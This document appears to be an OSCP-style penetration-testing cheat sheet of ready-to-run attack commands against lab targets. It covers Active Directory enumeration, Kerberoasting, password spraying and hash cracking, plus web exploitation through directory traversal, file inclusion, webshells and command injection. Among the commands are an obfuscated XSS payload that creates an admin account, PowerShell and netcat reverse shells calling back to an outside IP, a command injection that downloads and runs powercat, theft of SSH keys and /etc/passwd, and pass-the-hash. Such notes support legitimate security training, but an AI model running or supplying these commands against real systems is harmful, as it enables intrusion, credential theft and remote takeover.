- cmd: Get-NetComputer
lang: ps1
tags: oscp powershell windows PowerView
desc: enumerate the computer objects in the domain
- cmd: Get-NetComputer | select operatingsystem,dnshostname
lang: ps1
tags: oscp powershell windows PowerView
desc: enumerate the computer objects in the domain and list operating system and hostnames
- cmd: Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion
lang: ps1
tags: oscp powershell windows PowerView
desc: enumerate the computer objects with OS version
- cmd: Find-LocalAdminAccess
lang: ps1
tags: oscp powershell windows PowerView
desc: Scanning domain to find local administrative privileges for our user
- cmd: Get-NetSession -ComputerName files04 -Verbose
lang: ps1
tags: oscp powershell windows PowerView
desc: Checking logged on users
- cmd: Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
lang: ps1
tags: oscp powershell windows
desc: Displaying permissions on the DefaultSecurity registry hive
- cmd: .\PsLoggedon.exe \\files04
lang: ps1
tags: oscp powershell windows
desc: PsLoggedOn to see user logons at Files04
- cmd: setspn -L iis_service
lang: ps1
tags: oscp powershell windows
desc: Listing SPN linked to a certain user account
- cmd: Get-NetUser -SPN | select samaccountname,serviceprincipalname
lang: ps1
tags: oscp powershell windows
desc: Listing the SPN accounts in the domain
- cmd: nslookup.exe web04.corp.com
lang: ps1
tags: oscp powershell windows
desc: Resolving the web04.corp.com name
- cmd: Get-ObjectAcl -Identity stephanie
lang: ps1
tags: oscp powershell windows PowerView
desc: Running Get-ObjectAcl specifying our user
- cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
lang: ps1
tags: oscp powershell windows PowerView
desc: Converting the ObjectISD into name
- cmd: 'Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights'
lang: ps1
tags: oscp powershell windows PowerView
desc: Enumerating ACLs for the Management Group
- cmd: '"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104" | Convert-SidToName'
lang: ps1
tags: oscp powershell windows PowerView
desc: Converting all SIDs that have GenericAll permission on the Management Group
- cmd: net group "Management Department" stephanie /add /domain
lang: ps1
tags: oscp powershell windows
desc: Using "net.exe" to add ourselves to domain group
- cmd: Get-NetGroup "Management Department" | select member
lang: ps1
tags: oscp powershell windows PowerView
desc: Running "Get-NetGroup" to enumerate "Management Department"
- cmd: net group "Management Department" stephanie /del /domain
lang: ps1
tags: oscp powershell windows
desc: Using "net.exe" to remove ourselves from domain group
- cmd: Find-DomainShare
lang: ps1
tags: oscp powershell windows PowerView
desc: Domain Share Query
- cmd: ls \\dc1.corp.com\sysvol\corp.com\
lang: ps1
tags: oscp powershell windows
desc: Listing contents of the SYSVOL share
- cmd: ls \\dc1.corp.com\sysvol\corp.com\Policies\
lang: ps1
tags: oscp powershell windows PowerView
desc: Listing contents of the "SYSVOL\policies share"
- cmd: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
lang: ps1
tags: oscp powershell windows PowerView
desc: Using gpp-decrypt to decrypt the password GPP Group Policy Preferences
- cmd: Get-Help Invoke-BloodHound
lang: ps1
tags: oscp powershell windows BloodHound
desc: Checking the SharpHound options
- cmd: Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit" -prettyprint
lang: ps1
tags: oscp powershell windows PowerView
desc: Running SharpHound to collect domain data
- cmd: sudo neo4j start
lang: sh
tags: oscp
desc: Starting the Neo4j service in Kali Linux
- cmd: bloodhound
lang: ps1
tags: oscp sh
desc: Starting BloodHound in Kali Linux
- cmd: Find-InterestingDomainAcl -ResolveGUIDs
lang: ps1
tags: oscp powershell windows PowerView
desc: Search for interesting ACEs
- cmd: Get-DomaiObjectAcl -Identity <AccountName> -ResolveGUIDs
lang: ps1
tags: oscp powershell windows PowerView
desc: Returns the ACLs associated with the specified account
- cmd: Get-PathAcl -Path \\Path\Of\A\Share
lang: ps1
tags: oscp powershell windows PowerView
desc: Check the ACLs associated with a specified path (e.g smb share)
- cmd: Invoke-UserHunter -CheckAccess
lang: ps1
tags: oscp powershell windows PowerView
desc: Get members from Domain Admins (default) and a list of computers and check if any of the users is logged
- cmd: .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
lang: ps1
tags: oscp powershell windows PowerView
desc: Using Spray-Passwords to attack user accounts
- cmd: crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
lang: sh
tags: oscp
desc: Using crackmapexec to attack user accounts
- cmd: crackmapexec smb 192.168.56.30 --users
lang: sh
tags: oscp
desc: Using crackmapexec to enumerates user on DC
- cmd: crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
lang: sh
tags: oscp
desc: Crackmapexec output indicating that the valid credentials have administrative privileges on the target
- cmd: crackmapexec winrm 10.10.77.148 -u users -H ntml_hashs --continue-on-success
lang: sh
tags: oscp
desc: Crackmapexec bruteforce winrm using ntmlm hash
- cmd: .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
lang: ps1
tags: oscp
desc: Using kerbrute to attack user accounts
- cmd: for i in 70 74 76 75 72 73; do crackmapexec smb 192.168.247.$i -u pete -p 'Nexus123!' -d corp.com;echo; done
lang: sh
tags: oscp
desc: Spray the credentials of pete against all domain joined machines with crackmapexec
- cmd: impacket-GetNPUsers -dc-ip 192.168.247.70 -request -outputfile hashes.asreproast corp.com/pete
lang: sh
tags: oscp
desc: Using GetNPUsers to perform AS-REP roasting
- cmd: impacket-GetNPUsers -dc-ip 192.168.56.30 -no-pass -usersfile users.txt minilab/
lang: sh
tags: oscp
desc: try asreproasting on all the users
- cmd: sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
lang: sh
tags: oscp
desc: Cracking the AS-REP hash with Hashcat
- cmd: .\Rubeus.exe asreproast /nowrap
lang: ps1
tags: oscp powershell windows
desc: Using Rubeus to obtain the AS-REP hash of dave
- cmd: .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
lang: ps1
tags: oscp
desc: Utilizing Rubeus to perform a Kerberoast attack (TGS-REP)
- cmd: sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
lang: sh
tags: oscp
desc: Cracking the TGS-REP hash
- cmd: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
lang: sh
tags: oscp
desc: Using impacket-GetUserSPNs to perform Kerberoasting on Linux (TGS-REP)
- cmd: impacket-GetUserSPNs -request -dc-ip 192.168.56.30 mini.lab/carol:123456789
lang: sh
tags: oscp
desc: Using impacket-GetUserSPNs to perform Kerberoasting on Linux (TGS-REP)
- cmd: sudo hashcat -m XXX ./hashs.file /usr/share/wordlists/rockyou.txt -j '$1' --force
lang: sh
tags: oscp
desc: crack using rockyou and use a custom rule (here append 1 to password to match like secret1)
- cmd: whois megacorpone.com -h 192.168.50.251
lang: sh
tags: oscp
desc: Using whois on megacorpone.com
- cmd: whois 38.100.193.70 -h 192.168.50.251
lang: sh
tags: oscp
desc: Whois reverse lookup
- cmd: host www.megacorpone.com
lang: sh
tags: oscp
desc: Using host to find the A host record for
- cmd: host -t mx megacorpone.com
lang: sh
tags: oscp
desc: Using host to find the MX records for
- cmd: host -t txt megacorpone.com
lang: sh
tags: oscp
desc: Using host to find the TXT records for
- cmd: host idontexist.megacorpone.com
lang: sh
tags: oscp
desc: Using host to search for an invalid host
- cmd: for ip in $(cat list.txt); do host $ip.megacorpone.com; done
lang: sh
tags: oscp
desc: Using Bash to brute force forward DNS
- cmd: for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found"
lang: sh
tags: oscp
desc: Using Bash to brute force reverse DNS
- cmd: dnsrecon -d megacorpone.com -t std
lang: sh
tags: oscp
desc: Using dnsrecon to perform a standard
- cmd: dnsrecon -d megacorpone.com -D ~/list.txt -t brt
lang: sh
tags: oscp
desc: Brute forcing hostnames using dnsrecon
- cmd: dnsenum megacorpone.com
lang: sh
tags: oscp
desc: Using dnsenum to automate DNS enumeration
- cmd: nslookup mail.megacorptwo.com
lang: sh
tags: oscp
desc: Using nslookup to perform a simple host enumeration
- cmd: nslookup -type=TXT info.megacorptwo.com 192.168.50.151
lang: sh
tags: oscp
desc: Using nslookup to perform a more specific query
- cmd: nc -nvv -w 1 -z 192.168.50.152 3388-3390
lang: sh
tags: oscp
desc: Using netcat to perform a TCP port scan
- cmd: nc -nv -u -z -w 1 192.168.50.149 120-123
lang: sh
tags: oscp
desc: Using Netcat to perform a UDP port scan
- cmd: Test-NetConnection -Port 445 192.168.50.151
lang: ps1
tags: oscp
desc: Port scanning SMB via PowerShell
- cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null
lang: ps1
tags: oscp
desc: Automating the PowerShell portscanning
- cmd: sudo nbtscan -r 192.168.50.0/24
lang: sh
tags: oscp
desc: Using nbtscan to collect additional NetBIOS
- cmd: net view \\dc01 /all
lang: ps1
tags: oscp
desc: Running 'net view' to list remote shares
- cmd: Test-NetConnection -Port 25 192.168.50.8
lang: ps1
tags: oscp
desc: Port scanning SMB via PowerShell
- cmd: dism /online /Enable-Feature /FeatureName:TelnetClient
lang: ps1
tags: oscp
desc: Installing the Telnet client
- cmd: telnet 192.168.50.8 25
lang: ps1
tags: oscp
desc: Interacting with the SMTP service via Telnet on Windows
- cmd: for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips ; onesixtyone -c community -i ips
lang: sh
tags: oscp
desc: Using onesixtyone to brute force
- cmd: snmpwalk -c public -v1 -t 10 192.168.50.151
lang: sh
tags: oscp
desc: Using snmpwalk to enumerate the entire MIB
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25
lang: sh
tags: oscp
desc: Using snmpwalk to enumerate Windows users
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2
lang: sh
tags: oscp
desc: Using snmpwalk to enumerate Windows
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2
lang: sh
tags: oscp
desc: Using snmpwalk to enumerate
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3
lang: sh
tags: oscp
desc: Using snmpwalk to enumerate open TCP ports
- cmd: gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5
lang: sh
tags: oscp
desc: Running Gobuster
- cmd: cat /etc/hosts
lang: sh
tags: oscp
desc: Setting up our /etc/hosts file for offsecwp
- cmd: cat /usr/share/wordlists/rockyou.txt | head
lang: sh
tags: oscp
desc: Copying the first 10 rockyou wordlist values
- cmd: curl https://www.google.com/robots.txt
lang: sh
tags: oscp
desc: https://www.google.com/robots.txt
- cmd: gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern
lang: sh
tags: oscp
desc: Bruteforcing API Paths
- cmd: curl -i http://192.168.50.16:5002/users/v1
lang: sh
tags: oscp
desc: Obtaining Users' Information
- cmd: gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt
lang: sh
tags: oscp
desc: Discovering extra APIs
- cmd: curl -i http://192.168.50.16:5002/users/v1/admin/password
lang: sh
tags: oscp
desc: Discovering API unsupported methods
- cmd: curl -i http://192.168.50.16:5002/users/v1/login
lang: sh
tags: oscp
desc: Inspecting the login API
- cmd: curl -i http://offsecwp --user-agent "<script>eval(String.fromCharCode(118,97,114,32,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,114,101,113,117,101,115,116,85,82,76,61,34,47,119,112,45,97,100,109,105,110,47,117,115,101,114,45,110,101,119,46,112,104,112,34,44,110,111,110,99,101,82,101,103,101,120,61,47,115,101,114,34,32,118,97,108,117,101,61,34,40,91,94,34,93,42,63,41,34,47,103,59,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,71,69,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,49,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,41,59,118,97,114,32,110,111,110,99,101,77,97,116,99,104,61,110,111,110,99,101,82,101,103,101,120,46,101,120,101,99,40,97,106,97,120,82,101,113,117,101,115,116,46,114,101,115,112,111,110,115,101,84,101,120,116,41,44,110,111,110,99,101,61,110,111,110,99,101,77,97,116,99,104,91,49,93,44,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,97,116,116,97,99,107,101,114,38,101,109,97,105,108,61,97,116,116,97,99,107,101,114,64,111,102,102,115,101,99,46,99,111,109,38,112,97,115,115,49,61,97,116,116,97,99,107,101,114,112,97,115,115,38,112,97,115,115,50,61,97,116,116,97,99,107,101,114,112,97,115,115,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,40,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,41,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59))</script>" --proxy 127.0.0.1:8080
lang: sh
tags: oscp
desc: Launching the Final XSS Attack through Curl
- cmd: pwd ; ls / ; cat /etc/passwd
lang: sh
tags: oscp
desc: Display content of /etc/passwd with an absolute path
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
lang: sh
tags: oscp
desc: SSH Private Key via curl
- cmd: ssh -i dt_key -p 2222 offsec@mountaindesserts.com ; yes ; chmod 400 dt_key ; ssh -i dt_key -p 2222 offsec@mountaindesserts.com
lang: sh
tags: oscp
desc: Using the Private Key to connect via SSH
- cmd: curl http://192.168.50.16/cgi-bin/../../../../etc/passwd ; curl http://192.168.50.16/cgi-bin/../../../../../../../../../../etc/passwd
lang: sh
tags: oscp
desc: Using "../" to leverage the Directory Traversal vulnerability in Apache 2.4.49
- cmd: curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
lang: sh
tags: oscp
desc: Using encoded dots for Directory Traversal
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log
lang: sh
tags: oscp
desc: Log entry of Apache's access.log
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=admin.php
lang: sh
tags: oscp
desc: Contents of the admin.php file
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php
lang: sh
tags: oscp
desc: Usage of "php://filter" to include unencoded admin.php
- cmd: curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php
lang: sh
tags: oscp
desc: Usage of "php://filter" to include base64 encoded admin.php
- cmd: echo "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+TWFpbnRlbmFuY2U8L3RpdGxlPgo8L2hlYWQ+Cjxib2R5PgogICAgICAgIDw/cGhwIGVjaG8gJzxzcGFuIHN0eWxlPSJjb2xvcjojRjAwO3RleHQtYWxpZ246Y2VudGVyOyI+VGhlIGFkbWluIHBhZ2UgaXMgY3VycmVudGx5IHVuZGVyIG1haW50ZW5hbmNlLic7ID8+Cgo8P3BocAokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOwokdXNlcm5hbWUgPSAicm9vdCI7CiRwYXNzd29yZCA9ICJNMDBuSzRrZUNhcmQhMiMiOwoKLy8gQ3JlYXRlIGNvbm5lY3Rpb24KJGNvbm4gPSBuZXcgbXlzcWxpKCRzZXJ2ZXJuYW1lLCAkdXNlcm5hbWUsICRwYXNzd29yZCk7CgovLyBDaGVjayBjb25uZWN0aW9uCmlmICgkY29ubi0+Y29ubmVjdF9lcnJvcikgewogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiAkY29ubi0+Y29ubmVjdF9lcnJvcik7Cn0KZWNobyAiQ29ubmVjdGVkIHN1Y2Nlc3NmdWxseSI7Cj8+Cgo8L2JvZHk+CjwvaHRtbD4K" | base64 -d
lang: sh
tags: oscp
desc: Decoding the base64 encoded content of admin.php
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
lang: sh
tags: oscp
desc: Usage of the "data://" wrapper to execute ls
- cmd: echo -n '<?php echo system($_GET["cmd"]);?>' | base64 ; curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
lang: sh
tags: oscp
desc: Usage of the "data://" wrapper with base64 encoded data
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"
lang: sh
tags: oscp
desc: Exploiting RFI with a PHP backdoor and execution of ls
- cmd: curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=dir
lang: sh
tags: oscp
desc: Execution of dir command in the uploaded webshell
- cmd: pwsh ; $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' ; $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) ; $EncodedText =[Convert]::ToBase64String($Bytes) ; $EncodedText ; exit
lang: ps1
tags: oscp
desc: Encoding the oneliner in PowerShell on Linux
- cmd: ls -la /usr/share/webshells
lang: sh
tags: oscp
desc: Listing of the webshells directory on Kali
- cmd: curl http://mountaindesserts.com:8000/index.php ; curl http://mountaindesserts.com:8000/meteor/index.php ; curl http://mountaindesserts.com:8000/admin.php
lang: sh
tags: oscp
desc: Failed attempts to access PHP files
- cmd: ssh-keygen ; fileup ; cat fileup.pub > authorized_keys
lang: sh
tags: oscp
desc: Prepare authorized_keys file for File Upload
- cmd: ssh -o PubkeyAcceptedAlgorithms=ssh-rsa -o HostKeyAlgorithms=ssh-rsa user@192.168.195.245
lang: sh
tags: oscp
desc: connect on old SSH server
- cmd: rm ~/.ssh/known_hosts ; ssh -p 2222 -i fileup root@mountaindesserts.com ; yes
lang: sh
tags: oscp
desc: Using the SSH key to successufully connect via SSH as the root user
- cmd: curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive
lang: sh
tags: oscp
desc: Detected Command Injection for ipconfig
- cmd: curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive
lang: sh
tags: oscp
desc: Entering git as command
- cmd: curl -X POST --data 'Archive=git version' http://192.168.50.189:8000/archive
lang: sh
tags: oscp
desc: Using git version to detect the operating system
- cmd: curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive
lang: sh
tags: oscp
desc: Entering git and ipconfig with encoded semicolon
- cmd: curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive
lang: sh
tags: oscp
desc: Determining where the injected commands are executed
- cmd: curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive
lang: sh
tags: oscp
desc: Downloading Powercat and creating a reverse shell via Command Injection
- cmd: mysql -u root -p'root' -h 192.168.50.16 -P 3306
lang: sh
tags: oscp
desc: Connecting to the remote MySQL instance
- cmd: impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
lang: sh
tags: oscp
desc: Connecting to the Remote MSSQL instance via Impacket
- cmd: impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth ; EXECUTE sp_configure 'show advanced options', 1; ; RECONFIGURE; ; EXECUTE sp_configure 'xp_cmdshell', 1; ; RECONFIGURE;
lang: sh
tags: oscp
desc: Enabling xp_cmdshell feature
- cmd: sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user
lang: sh
tags: oscp
desc: Running sqlmap to quickly find SQL injection points
- cmd: sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump
lang: sh
tags: oscp
desc: Running sqlmap to Dump Users Credentials Table
- cmd: sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
lang: sh
tags: oscp
desc: Running sqlmap with osshell
- cmd: pip3 install wsgidav
lang: sh
tags: oscp
desc: Installing pip3 and WsgiDAV
- cmd: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
lang: sh
tags: oscp
desc: Starting WsgiDAV on port 80
- cmd: firefox --search "Microsoft Edge site:exploit-db.com"
lang: sh
tags: oscp
desc: Using Google to search for
- cmd: sudo apt update && sudo apt install exploitdb
lang: sh
tags: oscp
desc: Updating the exploitdb package from the
- cmd: ls -1 /usr/share/exploitdb/
lang: sh
tags: oscp
desc: Listing the two major sections in the archive
- cmd: ls -1 /usr/share/exploitdb/exploits
lang: sh
tags: oscp
desc: Listing the content of the exploits
- cmd: searchsploit
lang: sh
tags: oscp
desc: The searchsploit command syntax
- cmd: searchsploit remote smb microsoft windows
lang: sh
tags: oscp
desc: Using searchsploit to list available
- cmd: searchsploit -m windows/remote/48537.py ; searchsploit -m 42031
lang: sh
tags: oscp
desc: The exploits are copied the
- cmd: searchsploit -m 50944
lang: sh
tags: oscp
desc: The exploit is copied into our current working directory
- cmd: python3 50944.py -url http://192.168.50.11/project/ -u george@AIDevCorp.org -p AIDevCorp
lang: sh
tags: oscp
desc: The exploit completed successfully with an uploaded file
- cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoami
lang: sh
tags: oscp
desc: The PHP script was executed by the wwwdata system account
- cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc"
lang: sh
tags: oscp
desc: nc is installed on the target
- cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash"
lang: sh
tags: oscp
desc: The reverse netcat shell is executed and the terminal session does not respond
- cmd: searchsploit "Sync Breeze Enterprise 10.0.28"
lang: sh
tags: oscp
desc: Searching for available
- cmd: searchsploit -m 42341
lang: sh
tags: oscp
desc: Using searchsploit to copy
- cmd: sudo apt install mingw-w64
lang: sh
tags: oscp
desc: Installing the mingww64 crosscompiler in Kali
- cmd: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
lang: sh
tags: oscp
desc: Errors displayed after attempting
- cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
lang: sh
tags: oscp
desc: Using msfvenom to generate a
- cmd: sudo wine syncbreeze_exploit.exe
lang: sh
tags: oscp
desc: Running the Windows exploit using
- cmd: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
lang: sh
tags: oscp
desc: Compiling the exploit and setting up
- cmd: wine syncbreeze_exploit.exe
lang: sh
tags: oscp
desc: Running the final version of the
- cmd: curl -k https://192.168.50.45/uploads/shell.php?cmd=whoami
lang: sh
tags: oscp
desc: Verifying if our exploit was
- cmd: xxd -b malware.txt
lang: sh
tags: oscp
desc: Inspecting the binary file content with xxd
- cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f exe > binary.exe
lang: sh
tags: oscp
desc: Generating a malicious PE
- cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f powershell -v sc
lang: sh
tags: oscp
desc: Generating a PowerShell compatible
- cmd: .\bypass.ps1
lang: ps1
tags: oscp
desc: Attempting to run the script
- cmd: Get-ExecutionPolicy -Scope CurrentUser ; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser ; A ; Get-ExecutionPolicy -Scope CurrentUser
lang: ps1
tags: oscp
desc: Changing the ExecutionPolicy for our
- cmd: apt-cache search shellter ; sudo apt install shellter
lang: sh
tags: oscp
desc: Installing shellter in Kali Linux
- cmd: sudo apt install wine
lang: sh
tags: oscp
desc: Installing wine in Kali Linux
- cmd: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;"
lang: sh
tags: oscp
desc: Setting up a handler for the meterpreter payload
- cmd: cd /usr/share/wordlists/ ; ls ; sudo gzip -d rockyou.txt.gz ; hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
lang: sh
tags: oscp
desc: Unzipping Gzip Archive and attacking SSH
- cmd: hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
lang: sh
tags: oscp
desc: Spraying a password on RDP service
- cmd: hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
lang: sh
tags: oscp
desc: Successful Dictionary Attack on the Login Form
- cmd: echo -n "secret" | sha256sum ; echo -n "secret" | sha256sum ; echo -n "secret1" | sha256sum
lang: sh
tags: oscp
desc: Comparing resulting hash values for secret and secret1
- cmd: echo -n "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" | wc -c ; python3 -c "print(62**5)"
lang: sh
tags: oscp
desc: Calculating the keyspace for a password of length 5
- cmd: hashcat -b
lang: sh
tags: oscp
desc: Benchmark CPU with MD5, SHA1, and SHA2256
- cmd: python3 -c "print(916132832 / 134200000)" ; python3 -c "print(916132832 / 9276300000)"
lang: sh
tags: oscp
desc: Calculating the cracking time for password length of 5
- cmd: hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
lang: sh
tags: oscp
desc: Cracking a MD5 Hash with Hashcat and a mutated rockyou.txt wordlist
- cmd: ls -la /usr/share/hashcat/rules/
lang: sh
tags: oscp
desc: Listing of Hashcat's rule files
- cmd: ls -la Database.kdbx ; keepass2john Database.kdbx > keepass.hash ; cat keepass.hash
lang: sh
tags: oscp
desc: Using keepass2john to format the KeePass database for Hashcat
- cmd: cat keepass.hash
lang: sh
tags: oscp
desc: Correct hash format for Hashcat without "Database:"
- cmd: hashcat --help | grep -i "KeePass"
lang: sh
tags: oscp
desc: Finding the mode of KeePass in Hashcat
- cmd: hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
lang: sh
tags: oscp
desc: Cracking the KeePass database hash
- cmd: chmod 600 id_rsa ; ssh -i id_rsa -p 2222 dave@192.168.50.201 ; yes ; ssh -i id_rsa -p 2222 dave@192.168.50.201
lang: sh
tags: oscp
desc: SSH connection attempts with the private key
- cmd: ssh2john id_rsa > ssh.hash ; cat ssh.hash
lang: sh
tags: oscp
desc: Using ssh2john to format the hash
- cmd: hashcat -h | grep -i "ssh"
lang: sh
tags: oscp
desc: Determine the correct mode for Hashcat
- cmd: hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force
lang: sh
tags: oscp
desc: Failed cracking attempt with Hashcat
- cmd: cat ssh.rule ; sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
lang: sh
tags: oscp
desc: Adding the named rules to the JtR configuration file
- cmd: john --wordlist=ssh.passwords --rules=sshRules ssh.hash
lang: sh
tags: oscp
desc: Cracking the hash with JtR
- cmd: ssh -i id_rsa -p 2222 dave@192.168.50.201
lang: sh
tags: oscp
desc: Entering Passphrase to connect to the target system with SSH
- cmd: Get-LocalUser
lang: ps1
tags: oscp
desc: Showing all local users in PowerShell
- cmd: hashcat --help | grep -i "ntlm"
lang: sh
tags: oscp
desc: Hashcat mode for NTLM hashes
- cmd: hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
lang: sh
tags: oscp
desc: NTLM hash of user nelly in nelly.hash and Hashcat mode
- cmd: impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
lang: sh
tags: oscp
desc: NTLM hash of user nelly in nelly.hash and Hashcat mode
